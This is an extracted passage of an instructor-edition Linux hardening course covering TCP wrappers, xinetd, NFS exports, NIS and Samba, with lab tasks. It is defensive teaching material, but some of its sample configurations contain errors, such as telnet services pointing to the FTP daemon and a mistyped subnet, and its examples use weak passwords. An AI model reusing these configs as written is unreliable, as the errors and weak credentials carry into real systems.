/etc/hosts.allowALL except in.telnetd: LOCALALL except in.telnetd: 172.16.32.ALL: scnp_server.securitycertified.net

/etc/hosts.denyALL: ALL

2. Do not implement this solution; rather, discuss your results with the restof the class.

The xinetd SuperdaemonIn Linux, sooner or later, you will encounter a superdaemon. A superdaemon isessentially a daemon that controls other daemons. In this case, xinetd is asuperdaemon. Even earlier than the xinetd superdaemon was the inetdsuperdaemon, which handled network access requests. Inetd allowed for the dis-abling of services that you did not want to use, but provided no further securitycontrols. It has since been replaced by xinetd.

Xinetd is used with TCP wrappers to protect the services of the system. TCPwrappers controls the access to the services, and xinetd controls the configurationof the services themselves. The two work together, and are both part of the RedHat 8 distribution. (Previously, these two components had to be compiled andinstalled when needed.)

The xinetd.conf FileThe primary configuration information for xinetd is found in the /etc/xinetd.ddirectory. In this directory, you will find the specific configuration files for thenetwork services that you want to control. The primary configuration file thatmanages xinetd is called /etc/xinetd.conf.

For this task, make surethat students do not changethe actual files on their labmachines, or the successof future activities could beseverely compromised.

Lesson 3: Hardening Linux Computers 187

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 241: SCNP Hardening

The /etc/xinetd.conf file contains the configuration settings that are to apply to allservices. The default file has several options, including instances, log_type, log_on_success, log_on_failure, and cps. Figure 3-18 shows an example xinetd.conffile.

Figure 3-18: The default xinetd.conf file running on Red Hat Linux 8.0.

Looking at the defaults in the example file, the following is a breakdown of theoptions and their meanings:

• instances—This variable defines the maximum number of requests for a par-ticular service that can be handled at once.

• log_types—This variable defines how xinetd should handle logging. Thedefault is to use /etc/syslog.conf and set to /var/log/secure.

• log_on_success—This variable defines what xinetd will log if the connectionis successful. The default is Host IP Address and Process ID of the serverprocess.

• log_on_failure—This variable defines what xinetd will log if the connectionis a failure. The default is Host IP Address.

• cps—This variable defines the number of connections per second that areallowed to any one given service. This variable can be entered as two space-separated numbers—the first being the number of connections per second,and the second being the wait period (in seconds) if the max limit has beenreached.

Configuring xinetd(2 slides)

188 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 242: SCNP Hardening

The defaults are adequate for many situations, but there are some changes youcan make to the xinetd.conf file that will tighten the security of the defaultoperation. The following options are suggested for the file:

• Create a no-access rule for everyone. This means that access to services willneed to be configured on a service-by-service level. If you address this inyour TCP wrappers configuration, then this is a redundant step.

• Lower the number of instances to a service from the default of 60 to 30.You will want to keep an eye on this for services that you grant, such asFTP, so that clients are not denied access.

• Add a DURATION log for successful use of services by a remote system.This data can be used for tracking purposes.

• Add an ATTEMPT log for each failed attempt at accessing a service.

• Add a RECORD log for failed attempts to track information about theremote system. This only works with select services, such as login and fin-ger, that can be security risks when they are running.

• Add a restriction on the number of connections a single host can make to aservice. A recommendation is 10, and this is done using a per_source line.

• Disable all services that you want to have blocked completely. A commonexample of this is the “r” services, as they are inherently insecure.

The following example is what the xinetd.conf file might look like once you havemade these changes to harden its configuration:

instances = 30log_type = SYSLOG authprivlog_on_success = HOST PID DURATIONlog_on_failure = HOST ATTEMPT RECORDper_source = 10no_Access = 0.0.0.0/0disabled = rlogin rsh rexec

This example shows one possible configuration of a hardened xinetd.conf file.Once you have made the modifications to the overall configuration file, you canmove into the more granular configuration files of the specific services.

The xinetd.d Configuration FilesWhen the xinetd superdaemon starts, it reads the files in the /etc/xinetd.ddirectory. These files generally have the same, or similar, name as the servicethey are related to. The service-specific configuration files have the same filestructure as the overall xinetd.conf file you examined earlier.

Having separate and unique files in the xinetd.d directory allows for the manage-ment of services in simple, small files. Having one single file to manage wouldget out of control quickly, and would make it more complex to add and removeservices. The following example configuration file is for the ftp service:

service ftp{disable = nosocket_type = streamwait = nouser = rootserver = /usr/sbin/in.ftpdnice = 10}

Lesson 3: Hardening Linux Computers 189

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 243: SCNP Hardening

This example shows how a simple default configuration file looks. The configura-tion files generally share common characteristics:

• They start with the service name as the first line. This is generally the ser-vice name as listed in /etc/services.

• Following the service name are the braces, within which the configurationdetails are found.

• The first line defines the service availability. If you want this service to beunavailable to anyone, you can simply disable it at this point.

• The second line defines the connection type. Often, this will be either streamor dgram, although there are two other options: raw and seqpacket. Becausethe connection is set to stream, the wait is set to no, as is the normal casefor streams.

• The user that runs the ftp server is the root account.

• The server itself is located at /usr/sbin/in.ftpd.

• The nice command defines the priority level of the server; in this case, alevel of 10 is the average level. Levels historically run from -20 to 20, withthe lower number being the higher priority—the highest then is -20.

Figure 3-19: An example xinetd.d configuration file for the ftp service.

Figure 3-19 has had some additions made to the default ftp configuration file. Itis worth noting that there are over 40 configuration options that can be made inthese files, and not all options can be detailed here, in the interest of time. If youare interested in reading and examining all of the options, please read thexinetd.conf man pages.

One of the configuration options is to add to or remove from the existingconfiguration. This is done using either the += or the -= options. In other words,if you are adding a line such as DURATION to log_on_success, the option is the+=. This will now be added and included in the process of checks for that

TCP connections usuallyhave a stream socket type,

and UDP connectionsusually have dgram socket

types.

190 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 244: SCNP Hardening

service. Likewise, if you are ready to remove an option, you would use a linesuch as this: log_on_success -=DURATION. These would be variables thatyou want to add or remove not only from the configuration file itself, but in con-junction with the xinetd.conf configuration file.

The following examples define lines that can be added to the configuration filesto increase security, or to control the access of the system more closely. There isa comment above each line defining the line followed by the configuration lineitself.

# Change the log to a defined file, instead of using the defaultSYSLOGLog_type = FILE /var/log/custom_ftp_service.log# Grant access from only a single network, based on IP Addressonly_from = 10.20.0.0/16# Grant access to a single host, based on IP Addressonly_from = 10.20.23.45# Grant access to two hosts, based on IP Addressonly_from = 10.20.23.45 10.20.23.55# Deny access to a single host, based on IP Addressno_access = 10.20.23.45# Deny access to a single network, based on IP Addressno_access = 10.20.23.0/24# Grant access only during defined hoursaccess_times = 06:00 - 19:00# Adding the ability to track DURATION on successeslog_on_success += DURATION# Removing the option to track the RECORD on failureslog_on_failure -= RECORD# Set the priority at a high level (for example, 3)nice = 3# Add an identifier for the internal ftp serverid = internal_ftp# Prevent a process from using large amounts of# the processor. Define the total processor load at 2.5.max_load = 2.5# Prevent flooding of the system for the same service# requests simultaneously. Limit the connections to 5# Define the wait for new connections at 45 secondscps = 5 45

Binding and RedirectionAnother feature of xinetd is the ability to bind a service to an IP address. Thiscan be a useful feature, even more so if your computer has multiple interfaces ormultiple IP addresses. This feature is added by using the bind = IP Address linein the configuration file.

The following example is an FTP server that has two interfaces. One interface isfor the internal network, and the other is for the external network. The internalnetwork has no restrictions on access to the FTP server, but the external networkis allowed to access the server only between 10:00 A.M. and 4:00 P.M. The firstfile is the configuration for the internal clients. This is bound to an IP address,and allows only certain IP addresses to connect.

Lesson 3: Hardening Linux Computers 191

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 245: SCNP Hardening

/etc/xinetd.d/ftp_internalservice ftp{id = ftp_internaldisable = nosocket_type = streamwait = nouser = rootserver = /usr/sbin/in.ftpdnice = 7cps = 5 30only_from = 192.168.10.0/24bind = 192.168.10.1}

This second file is the configuration for the external clients. Notice that the prior-ity level is a bit lower, and that the cps is a lower value. There are no IP addressrestrictions, but there is a time restriction.

/etc/xinetd.d/ftp_externalservice ftp{id = ftp_externaldisable = nosocket_type = streamwait = nouser = rootserver = /usr/sbin/in.ftpdnice = 10cps = 4 45bind = 192.168.20.1access_times = 10:00-16:00}

These examples show how bind can be used with xinetd. Another feature iscalled redirection. Redirection allows for a service to redirect requests for theservice to a different IP address and port number. A user can be rerouted to a dif-ferent machine entirely for access to the service, with no notice given to theuser—this is designed to be transparent.

When binding and redirection are combined, you can create some very customconfigurations. For example, you can bind a service to an IP address, then redi-rect the request for the service to a second machine in the network. This enablesa request for a service to go to a computer that is customized to serve just thedefined purpose. The second computer does not have to be a Linux machine. Allthat is required is that it is running the required service, in the right location (thespecified port). The right location is mentioned because you can change the portnumbers of services, so as long as the second computer is running the desiredservice on the defined port, any number will do.

In this example, there are two configurations for the telnet service. The first con-figuration is for the computer that is connected to the Internet, and the one thatwill be forwarding the request, which is going to port 3456.

192 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 246: SCNP Hardening

service telnet{id = telnet_externaldisable = nosocket_type = streamwait = nouser = rootserver = /usr/sbin/in.ftpdbind = 192.168.10.1redirect = 172.16.34.51 3456}

The second computer has a configuration similar to a normal telnet configurationfile. There are no lines here regarding binding and redirection.

service telnet3456{id = telnet_internaldisable = nosocket_type = streamwait = nouser = rootserver = /usr/sbin/in.ftpdbind = 172.16.34.51port = 3456}

TASK 3C-2Managing Telnet with xinetd

Setup: For this task, students should work in pairs. You are logged onto Red Hat 8 as root, and a Terminal Window is open.

1. Open Red Hat User Manager, and create a new user named telnettest,with the password of telnetpwd. Then close User Manager.

2. Open the Nautilus File Manager, and navigate to /etc/xinetd.d.

3. Right-click the telnet configuration file, and open it with Emacs. Emacsis a popular Linux text editor.

4. Enable Telnet, making sure that disable = no is set.

5. Save and close the file.

6. In a Terminal Window, enter killall -HUP xinetd to kill and restart thexinetd process so that your changes can take effect.

7. Enter telnet <partnerIPaddress> to attempt to telnet into your partner’scomputer. Use the telnettest credentials specified at the start of this task.

8. After a login has been established, enter exit to close the telnet session.

9. Use Emacs to open the telnet configuration file in /etc/xinetd.d.

Lesson 3: Hardening Linux Computers 193

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 247: SCNP Hardening

10. Place the insertion point at the end of the line just before the closingbracket, and press Enter. Add the following line to your configuration:only_from = 10.20.30.40 to restrict usage of the telnet service. This IPaddress should not exist in the classroom!

11. Save and close the file.

12. Kill and restart the xinetd process so that your changes can take effect.

13. Attempt to telnet into your partner’s computer. This time the connectionis not successful.

14. Close the Nautilus File Manager.

Topic 3DSecuring Network ServicesThe next step in securing your Linux machine is to secure any network services,such as NFS, NIS, and Samba, that you have running on it. Let’s begin withNFS.

NFSThe Network File System (NFS) enables hosts to mount partitions on remotecomputers and use those mounted partitions in the same manner as localpartitions. This allows for sharing of flies to authorized users across the network.The fact that they are accessed like local partitions means that neither specialpasswords nor special access commands are required.

There are two primary components of using NFS, the NFS server and the NFSclient. The general process is quite straightforward. The NFS server creates theshared object, which is called the export. The NFS client then mounts theexported object from the NFS server.

If your system is running TCP wrappers, the /etc/hosts.allow and /etc/hosts.denyfiles will be read to identify if a client is allowed to access the NFS server. If theclient is granted access through TCP wrappers, the configuration file for the NFSserver is /etc/exports.

NFS Server ConfigurationCreating the actual object you want to share on the NFS server is a matter of afew short steps. But, before jumping right into the configuration of the sharedobjects, you should take a moment to look into the files behind NFS, and howNFS works.

The three primary configuration files for setting up and using NFS securely are/etc/hosts.deny, /etc/hosts.allow, and /etc/exports. Earlier in this course, you usedthe /etc/hosts.deny and the /etc/hosts.allow files, so they will not be detailed here(but they will be involved). This leaves /etc/exports as the new file to configure.

The /etc/exports is essentially the access control configuration file for the file sys-tems that are to be exported to NFS clients. This file is used by two daemons, theNFS mount daemon (mountd), and the NFS file server daemon (nfsd).

Configuring NFS

194 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 248: SCNP Hardening

The mountd program is used in NFS when the server receives a mount requestfrom an NFS client. It checks the /etc/exports file for access rights, and if accessis permitted, mountd creates a file-handle request for the requested directory, andadds a single entry to the /etc/rmtab file. When an unmount request is received,mountd removes the client’s entry from /etc/rmtab. (The /etc/rmtab file contains alisting of clients that have mounted remote file systems from the local machine.)Mountd can be started in xinetd, and can be controlled by using TCP wrappers.For example, if you want all users to have access to the mountd daemon, addthese lines to the /etc/hosts.allow file:

# Allow all hosts access to the mount daemonrpc.mountd: ALL

The nfsd daemon runs on the NFS server and handles the client requests for filesystem operations. Although the details of each are beyond the scope of thisbook, there are a few other daemons that are used in serving NFS. All told, thereare five daemons—rpc.nfsd, rpc.lockd, rpc.statd, rpc.mountd, and rpc.rquotad.These daemons are part of the nfs-utils package, and are usually found in the/sbin or in the /usr/sbin directory.

Finally, on the service end, NFS depends on the portmapper daemon. This dae-mon is called either portmap or rpc.portmap. Portmap converts Remote ProcedureCalls (RPC) program numbers into DARPA protocol port numbers. When anyRPC server starts, it lets portmap know what port it is listening to and the RPCprogram numbers it will serve. If a client calls an RPC program number, itchecks with portmap to find the port number to send RPC packets to. BecauseNFS uses RPC, portmap is a requirement.

With the services and daemons defined, you are now ready to get into the mainconfiguration file for the NFS server. The /etc/exports file contains a mount pointto the object to be shared and a list of the machines or other clients that areallowed to mount the file system.

Clients who want to use NFS can be defined by using different methods. One isto use the Network Information Service (NIS). NIS will be detailed shortly. Out-side of NIS, you can use IP addresses, domain names, subnets, and wildcards.

The syntax then is as follows: <directory to share><client1>(options) <client2> (options). The options are defined for theclients, to control their abilities to access the shared directory. There are fiveoptions for client access:

• ro—This option states that the directory access to the client is Read-Only.This is the default.

• rw—This option states that the directory access to the client is Read andWrite.

• no_root_squash—By default, on the NFS server, any request made by theroot account is treated as if it were made by the nobody user account. (TheUID of nobody is based on the setting on the NFS server, not the client.) Ifthis option is enabled, then any request made by the root account on the

DARPA:Defense Advanced ResearchProjects Agency.

Lesson 3: Hardening Linux Computers 195

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 249: SCNP Hardening

remote machine is given the same level of access as the root account on theNFS server. For this reason, this setting is not recommended.

• no_subtree_check—If you want to export only part of a volume, a check ismade that the file the NFS client is requesting is an appropriate part of thevolume. If the whole volume is exported, unchecking this option canincrease the transfer rate.

• sync—The command exportfs (part of the syntax of NFS) can use asynchand synch methods of informing the NFS client that a Write operation hasfinished. In the case of synch, the server replies to the client indicating asuccessful write has finished. In the case of asynch, the reply is sent to theclient once the request is processed, instead of waiting for the Write opera-tion to finish.

Here are a few examples of what lines in the /etc/exports file might look like:

# Export /R&D to IP Address 172.16.55.63 with read# and write access/R&D 172.16.55.63(rw)# Export /Policy to the entire 172.16.55.0/24 network# with read access/Policy 172.16.55.0/255.255.255.0(ro)# Export /Tech to the 192.168.20.0/24 network# allowing root access, and read and write access/tech 192.168.20.0/24(rw) no_root_squash

Configuring NFS ExportsJust as with other configuration options in Linux, there are several methods tosetting up NFS. You have examined some of the command lines, programs, anddaemons that are involved in using NFS. One of the graphical methods of work-ing with NFS is through the Webmin Web-based administrative tool you installedearlier in the lesson. Figure 3-20 shows Webmin’s window for creating a newexported directory.

You can see that the options are presented in a simple-to-use GUI that providesfields to fill in and radio buttons to configure the shared directory. Remember thatwhen you are using this tool, you can access and configure this information usingany browser.

196 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 250: SCNP Hardening

Figure 3-20: Using Webmin to create an exported directory.

Webmin provides for one option of configuring NFS, and you should explore itsabilities. In this section, however, you are going to perform tasks using the toolsbuilt in to the Red Hat operating system.

The tool to use in Red Hat is called NFS Server, and it is found by choosingServer Settings from the Red Hat Main Menu, or by entering the commandredhat-config-nfs in a Terminal Window. Figure 3-21 shows the NFS Server tool.

Lesson 3: Hardening Linux Computers 197

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 251: SCNP Hardening

Figure 3-21: Red Hat’s NFS Server Configuration tool.

In this tool, there are only a few primary options. The first one to examine is theprocess of adding a share. To do this, simply click the Add button to display thefollowing window, where the share information can be defined.

Figure 3-22: Adding an NFS Server share in the NFS Server configuration tool.

The Basic tab has just a few fields to fill out to create the share. In the Directoryfield, you fill in the directory that you want to share (be sure that the directoryactually exists!). In the Hosts field, you fill in the hosts that are to access theshare. Then, select the permission level you want to grant for the share.

The General Options tab has several more fields to fill out, but none that arerequired to create the share. Finally, the User Access tab presents a few morefields you can fill out, such as the previously mentioned no_root_squash.

198 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 252: SCNP Hardening

If you want to modify a currently existing NFS share, simply open the NFSServer configuration tool, select the rule, and click Properties. Likewise, to deletea rule, simply select the rule, and click Delete.

At any time, you can check the implementation of the NFS shares you are creat-ing by looking in the /etc/exports file, to be sure the configurations are as youwere expecting. All applied changes in the server tool will be visible in the /etc/exports file.

From the NFS client standpoint, the configuration is even more streamlined. Theclient computer requires portmap, rpc.statd, and rpc.lockd to be running, just asthey are required on the server. These services should be configured to start at thebootup process. Once those services are enabled, then the client configuration canhappen. There are a few ways to configure the client to use NFS.

The first option is to use the default mount command to mount the exporteddirectory. Even though this is a simple process, there is a downside to that con-figuration option—every time the system restarts, the root account will need toenter the mount command and reconnect to the shared directory. Furthermore, theroot account is required to unmount the shared directory every time the systemshuts down. Here are a couple of examples to show the configuration of a stan-dard mount command for an exported directory.

# NFS Server 10.20.23.45, exporting /home is# mounted to the localhost in /tmp/45/homemount 10.20.23.45:/home /mnt/tmp/45/home# NFS Server host1.example.com, exporting /test is# mounted to the localhost in /testmount host1.example.com:/test /test

As was mentioned, the standard mount commands are to be entered by the rootaccount upon the system starting up, and the mounts are to be unmounted by theroot account as the system shuts down. It would be more efficient in many situa-tions for that process to be automatic, and not require the manual input of theroot account. This is done by adding the NFS file systems to the /etc/fstab file.This way, NFS mounts are added when the system starts up, in the same mannerthat local file systems start. The basic syntax of the /etc/fstab file is <device><mountpoint> <fs-type> <options> <dump> <fsckorder>,where:

• Device is the location of the NFS exported directory.

• Mountpoint is the mount location on the local host.

• Fs-type is the file system type; here, it will be nfs.

• Options is the options, such as the (ro) or (rw) permissions.

• Dump is usually 0 for NFS shares.

• Fsckorder is usually 0 for NFS shares.

The following is an example of an NFS client /etc/fstab line. This line states thatthere is an NFS server exporting a directory at host1.example.com/scnp, the localmount point is /mnt/certs/scnp, and the access permissions are read and write.

Host1.example.com:/scnp /mnt/certs/scnp nfs rw 0 0

Lesson 3: Hardening Linux Computers 199

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 253: SCNP Hardening

TASK 3D-1Sharing Data with NFS

Setup: For this task, students should work in pairs. You are logged onto Red Hat 8 as root, and a Terminal Window is open.

1. Create a directory called /nfs_share.

2. Add files and/or directories to the new folder by creating new files orcopying them from elsewhere.

3. From the Red Hat Main Menu, choose Server Settings→NFS Server toopen the NFS Server Configuration tool.

4. Click the Add button.

5. In the Directory field, browse to your nfs_share directory. You can alsotype the directory name into this field.

6. Change the permissions to Read and Write.

7. In the Hosts field, enter the IP address of your partner’s computer.

8. Click OK to accept the settings, and to close the Add NFS Share window.

9. Click the Apply button to force the changes to take effect. If you areprompted to start the NFS Service, click Yes.

10. Close the NFS Server Configuration tool, saving changes if prompted.

11. Create a directory named /mnt/nfs1.

12. In a Terminal Window, enter mount a.b.c.d:/nfs_share /mnt/nfs1 to mountto your partner’s NFS share. Be sure to replace a.b.c.d with your partner’s IPaddress.

13. Browse in your /mnt/nfs1 directory to see what files you now have accessto.

If you are denied access to the files, check the permissions on the nfs_share directory. The Others must have Read permissions in order to see thefiles in the NFS share.

14. Close all open windows.

Securing NFSAs you can see, NFS provides a straightforward method of sharing files anddirectories between hosts. You might also have seen how there are very littlesecurity controls in place. You will need to take advantage of the available secu-rity controls in order to provide a safe NFS environment.

200 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 254: SCNP Hardening

You might have noticed that there were no authentication measures in the processof using NFS. The closest was having the right IP address. If your ID matchesthe one that is assigned to the export in the NFS server, you are granted access.Other problems can exist with User IDs.

For example, assume User1 on the NFS Server has a UID of 1234 and creates afile in a directory that is exported. User1 then sets the permissions so that onlyUser1 has access to this file. If User2 (on another machine) also has a UID of1234 and mounts the exported directory, User2 will have access to the object thatwas previously secured. Don’t despair, however; you can make NFS more securethan the default!

The primary service to secure for NFS is the portmap service. To start, be surethe portmap is protected by TCP wrappers, as per your design. It is recommendedthat the portmap service is provided only to those who specifically need it. Ifonly a small section of your internal network needs to use NFS, then yourportmap-specific TCP wrappers files will look something like this:

/etc/hosts.allowportmap: 172.16.23.0/16

/etc/hosts.denyportmap: ALL

Another issue with NFS is that if you export a directory, you are exporting thesubdirectories in that main directory. From a security perspective, this can causeobvious issues; in this case, the unique permissions that apply to the lines in /etc/exports. In this example, you want to provide access to the 192.168.10.0/24network for the main exported directory, /scnp. However, you do not want the192.168.10.0/24 network to have access to the /scnp/results directory.

/scnp 192.168.10.0/24(ro)/scnp/results 192.168.10.0/24(noaccess)

Even though it may seem straightforward, another issue to watch out for is mak-ing mistakes in typing in what you want to be exported. A simple syntax errorcan export volumes that you did not want exported. Consider the ramifications ofthe following two lines, where there are slight differences:

/temp/db23/ 192.168.10.0/24(rw)/temp/db23/ 192.168.10.0/24 (rw)

The difference is so minor you might not even see it at first. Note that in the firstline, there is no space between the network address and the permissions, but inthe second line there is a space. This space makes all the difference. Adding thespace, as in the second example, sets the permissions as exporting to everyone,even though an address is defined.

After you create your NFS shares, regardless of how you create them, be surethat you verify the exporting is as desired. This can be done quickly from a Ter-minal Window by using the command showmount -e <hostname>.

Lesson 3: Hardening Linux Computers 201

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 255: SCNP Hardening

TASK 3D-2Verifying Export Permissions

Setup: You are logged on to Red Hat 8 as root.

1. Create four directories named /NFS_1 through /NFS_4.

2. Use the NFS Server Configuration tool to create the following exporteddirectories:

Directory: /NFS_1 ; Host: 192.168.10.1 ; Permissions: Read-Only

Directory: /NFS_2 ; Host: 172.16.10.2 ; Permissions: Read-Only

3. Apply the changes, and close the NFS Server Configuration tool. Savechanges if you are prompted to do so.

4. Navigate to the /etc/exports file, and open it in Emacs.

5. Add the following lines:

/NFS_3/ 192.168.10.1(ro,sync)

/NFS_4/ 172.16.10.2(rw,sync)

6. Save and close the file.

7. In a Terminal Window, enter exportfs -rav to enact the changes in the filethat you manually added.

8. Read the response provided on the screen.

9. In the Terminal Window, enter showmount -e <hostname> to check theexport permissions.

If the export permissions are not displayed by using the showmount com-mand, you can view them in the /etc/exports file or in the NFS ServerConfiguration Tool.

10. Observe the difference in the permissions for NFS_4 versus the othersyou added.

11. Close all open windows.

NISNetwork Information Service (NIS) was formerly called the Yellow Pages (orsimply YP), and it is unlikely that you will be running it in a productionenvironment. There are different versions of NIS, most notable NIS and NIS+.NIS+ has increased security built into it; however, development work on NIS+has stopped, and is not often implemented in a production environment.

202 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 256: SCNP Hardening

NIS itself uses RPC and the client/server model to allow for a distributed infor-mation of login names/passwords/home directories (/etc/passwd) and groupinformation (/etc/group). The function of this is that you can have your passwordinformation listed in the NIS Server database, and you can log in to any machineon the network that has the NIS client running.

NIS OperationIn a network running NIS, there must be (at the minimum) one server running asthe NIS Server. The NIS Server is serving an NIS domain, which is a logicalname for the grouping of computers that will use NIS together. Do not confusethis with a DNS domain name, or with a Microsoft domain. The NIS domain isunique to the function of NIS. The NIS terminologies of the servers that serve thedomain are Master and Slave. There is one Master NIS Server and multiple SlaveNIS Servers.

The /etc/passwd and /etc/group files are converted to DBM format by using theASCII-to-DBM conversion software makedbm. The Master NIS Server then has aDBM and ASCII version of the databases. The database is called an NIS map.For example, the NIS map /var/yp/Marketing might be for the domain Marketing.

Any time there is a change to the NIS maps, the Slave Servers are notified, fromthe yppush program, and synchronize their databases. NIS clients do not receivethis information, only the servers.

As networks become more complex, and as attacks get more sophisticated, youwill likely want to migrate to a more secure means of authentication across thenetwork. That means is Kerberos. Kerberos uses Secret-Key cryptography to pro-vide for secure communications. Detailed discussions of NIS and Kerberos areboth beyond the scope of this course.

What is Samba?Samba is a suite of programs that makes use of the Server Message Block (SMB)Protocol. It is often used to solve the communication problems that Linux andWindows machines normally have when trying to share files. Samba makes itpossible to share directories with Windows machines in a simple and straightfor-ward manner that does not require the Windows clients to use anything other thantheir built-in networking utilities.

This touches on one of the problems that people had with file sharing beforeSamba. A Linux machine already running as an NFS server could share files withWindows machines, but the Windows client was required to run PC-NFS to gainaccess to the NFS shares. There were two primary problems with the NFS way ofsharing files:

• First, there was a cost attached to the use of the third party PC-NFS clientsoftware.

• Second was that the client software itself would often crash and cause prob-lems with PC applications.

crash:A sudden, usually drasticfailure of a computer system.

Lesson 3: Hardening Linux Computers 203

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 257: SCNP Hardening

More Uses for SambaAll right, you now know that Samba can help you share files on a Linux machineso that Windows clients can access them. What if you want to access a shareddirectory on a Windows machine from a Linux machine? Fortunately, that abilityis also built into Samba with the smbclient. To use smbclient to access a Win-dows share called marketing, on a machine called fuzzybunny, with the useraccount johni, you would enter the following command into a Terminal Window:

smbclient //fuzzybunny/marketing -U johni

Your request will be sent to fuzzybunny and you will be prompted for a passwordbefore being allowed to proceed.

Even though it is beyond the scope of this course, the Samba server can do farmore than just act as a means for sharing files; the Samba server can also:

• Be a NetBIOS name server.

• Support ACLs on printer and file shares.

• Act as a Windows NT Domain Controller.

• Engage in NetBIOS Browsing.

• Be a Master Browser for a Windows network.

• Support RPC-based and LanMan printing.

But even if Samba can perform any of these, or other, roles, it is still not a Win-dows server—the very machine that was designed to do those tasks. So whywould anyone replace a Windows machine, such as a file or print server, with aLinux machine running Samba? As usual, the bottom-line answer is often due tothe bottom line. Licensing costs for Windows NT Server can rapidly add up,while Red Hat Linux with Samba support can legally be had completely free ofcharge, excluding the cost of your bandwidth to download and burn the CDimages.

Samba’s Configuration FilesEditing the files needed to configure the Samba server so that it will share direc-tories with the rest of your network is relatively straightforward, at least for abasic implementation. The file you will be most concerned with is smb.conf,which (in a default install) should be located in the /etc/samba/ directory. In thetask for configuring Samba, you will be using a very simple configuration, butthere are many more options that are available for you to use.

In broad terms, the smb.conf file is separated into two sections:

• The Global Settings section has settings that apply to the overall running ofthe server, such as the name of the workgroup and its description, IP restric-tions, guest accounts, logging, encryption use, Browser control modes,WINS and DNS settings, and security modes.

• The Share Definitions section defines the properties of the individual sharesthat are configured for the server.

Even though the configuration we will be using in the upcoming task will nothave too many parameters defined, we will still step through them here. Here isthe configuration you will be working with:

To explore these options, feelfree to look at the defaultsmb.conf file before you

modify it. It has numeroussample configurations withexplanations that will showmany more of the options

available to you.

Configuring Samba

204 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 258: SCNP Hardening

# global settingsworkgroup = workgroupserver string = Samba Serverhosts allow = 172.16.0. 172.17.0. 172.18.0. 127.security = userlocal master = noname resolve order = host bcastencrypt passwords = yessmb passwd file = /etc/samba/smbpasswdsocket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192# share definition[public share]comment = public samba sharepath = /samba_sharebrowseable = yespublic = yeswritable = yes

The first part of the file contains the Global Settings, which define the following:

• Workgroup—This field defines the name of the workgroup under which youwant the server to appear. The default is MYGROUP, but to be part of thesame workgroup that Windows uses by default, we will use workgroup.

• Server string—This field will display as text under the Comment field inNetwork Neighborhood.

• Hosts allow—This will restrict access to the hosts or networks you define.Although not really important in the classroom, you should define your net-work and your loopback address here. For instance, if you are in the 17.16.0.0/16 network, to permit your peers and yourself to access the Samba share,your entry would look like this:

172.16. 127.

• Security—This sets the security mode to“user level” (which accepts orrejects requests based upon a user name and password. For share-level secu-rity, the client authenticates itself for each separate share.

• Local master—This line states that the Samba server will not become themaster browser in the network. If you want it to participate in the normalmaster browser elections, change the setting to yes (you should also definean OS level if you want it to have a chance of winning).

• Name resolve order—This line tells Samba to check its /etc/hosts file forname resolution. If no entry is found, then resort to a broadcast to resolvethe IP.

• Encrypt passwords and smb passwd file—These entries tell Samba to useencrypted passwords (that’s oversimplified for now; it deals with sendinghashes for the challenge/response system), and where the 16-byte hash val-ues are stored for Samba users (much in the way that the shadow file storeshashed passwords for normal users).

• Socket options—These options are simply for performance.

Be aware that there is aperiod after the 16, a singlespace between that periodand the 127, and a periodafter the 127.

Lesson 3: Hardening Linux Computers 205

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 259: SCNP Hardening

The second part of the file has the Share Definitions, which define the following:

• [public share]—Sets the name for the share.

• Comment—Sets the comment that clients browsing the network will see forthe share.

• Path—Indicates where the real shared directory can be found for the share.

• Browseable—Defines whether clients will be able to find the share bybrowsing Network Neighborhood.

• Public—Setting to yes means that it is not a private share for restrictedusers.

• Writable—Permission selection, defines that users are able to write to theshare.

Running and Maintaining SambaIt should be obvious that before users can connect to the Samba server, thereneeds to be user accounts for the Samba server to authenticate users against. Tocreate these accounts specific to Samba, use the smbpasswd -a command. Theuser account should already exist on the Linux system. This command specifiesthat the user name should be added to the local smbpasswd file, using the newpassword given in the command. For example, to add the account administrator_bob with a password of administrator to the local /etc/samba/smbpasswd file, youwould use this command:

smbpasswd -a administrator_bob administrator

Once changes have been made to the smb.conf file, you need to tell the machineto account for these changes and reapply the configuration. You can do this byrestarting the Samba service. To stop, start, or—in one command—stop andrestart the Samba service, you can use any of these commands:

• /etc/rc.d/init.d/smb stop

• /etc/rc.d/init.d/smb start

• /etc/rc.d/init.d/smb restart

Once Samba is configured and running, any Windows client that is allowed to useNetwork Neighborhood (or My Network Places, as the case may be) will be ableto find the Samba server, as long as the share has been marked asbrowsable = yes.

Figure 3-23: The Samba server shows up in My Network Places.

206 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 260: SCNP Hardening

Double-clicking the Samba server, like any other machine in the network, willmake the computer try to authenticate the incoming request before continuing.After the browsing computer has authenticated, a list of shares is presented to theuser.

Figure 3-24: The Samba share as seen by administrator_bob.

